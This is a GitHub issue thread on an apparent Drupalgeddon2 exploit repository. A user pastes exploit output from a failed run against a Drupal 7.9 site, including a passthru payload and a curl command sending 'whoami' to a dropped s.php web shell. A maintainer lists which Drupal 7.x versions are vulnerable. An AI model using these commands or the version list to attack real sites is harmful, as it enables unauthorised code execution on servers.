Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Drupal v7.9 - "[+] Drupal!: can detect a matching directory" #23

Open
kill-20 opened this issue Apr 18, 2018 · 2 comments
Open

Drupal v7.9 - "[+] Drupal!: can detect a matching directory" #23

kill-20 opened this issue Apr 18, 2018 · 2 comments
Assignees
Labels
bug Something isn't working help wanted Extra attention is needed

Comments

@kill-20
Copy link

kill-20 commented Apr 18, 2018

Hi!
Thank you for sharing this PoC! It works like a charm on my 7.28 and 7.56.
However, on 7.9 site I only get

[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[*] Target : http://xxxxx/
--------------------------------------------------------------------------------
[!] MISSING: http://xxxxx/CHANGELOG.txt (404)
[!] MISSING: http://xxxxx/core/CHANGELOG.txt (404)
[+] Found  : http://xxxxx/includes/bootstrap.inc (200)
[+] Drupal!: can detect a matching directory
--------------------------------------------------------------------------------
[*] Testing: Code Execution
[*] Payload: echo TZPPOZNH
[!] Unsupported Drupal version

Obviously, exploit encounters some problems while determining drupal version.
Earlier versions of the exploit respond with

*nothing interesting above, I think*
[+] Drupal!: can detect a matching directory
--------------------------------------------------------------------------------
[*] PHP cmd: passthru 
--------------------------------------------------------------------------------
[+] Target seems to be exploitable! w00hooOO!
[+] Result: *lots of html code of http://xxxxx/?q=user/password/*
--------------------------------------------------------------------------------
[*]   curl 'http://xxxxx/s.php' -d 'c=whoami'
--------------------------------------------------------------------------------
[!] Exploit FAILED ~ Response: 404

I would appreciate any help getting this exploit to work.
Thanks in advance.
Regards,
kill-20

@g0tmi1k g0tmi1k self-assigned this Apr 19, 2018
@g0tmi1k g0tmi1k added the bug Something isn't working label Apr 19, 2018
@g0tmi1k
Copy link
Collaborator

g0tmi1k commented Apr 19, 2018

I will install it locally (I've not tried that version) and get back to you


Edit: Yup. I'm having the same issue too. I wonder if v7.9 is vulnerable to it.

@g0tmi1k g0tmi1k changed the title [+] Drupal!: can detect a matching directory Drupal v7.9 - "[+] Drupal!: can detect a matching directory" Apr 26, 2018
@g0tmi1k
Copy link
Collaborator

g0tmi1k commented Jul 3, 2018

So I've had a play about with a few v7.x:

v7.22 - not vulnerable
v7.23 - vulnerable
...
v7.57 - vulnerable
v7.58 - not vulnerable

The exploit may need tweaking for a larger range of versions!

@g0tmi1k g0tmi1k added the help wanted Extra attention is needed label Sep 13, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working help wanted Extra attention is needed
Projects
None yet
Development

No branches or pull requests

2 participants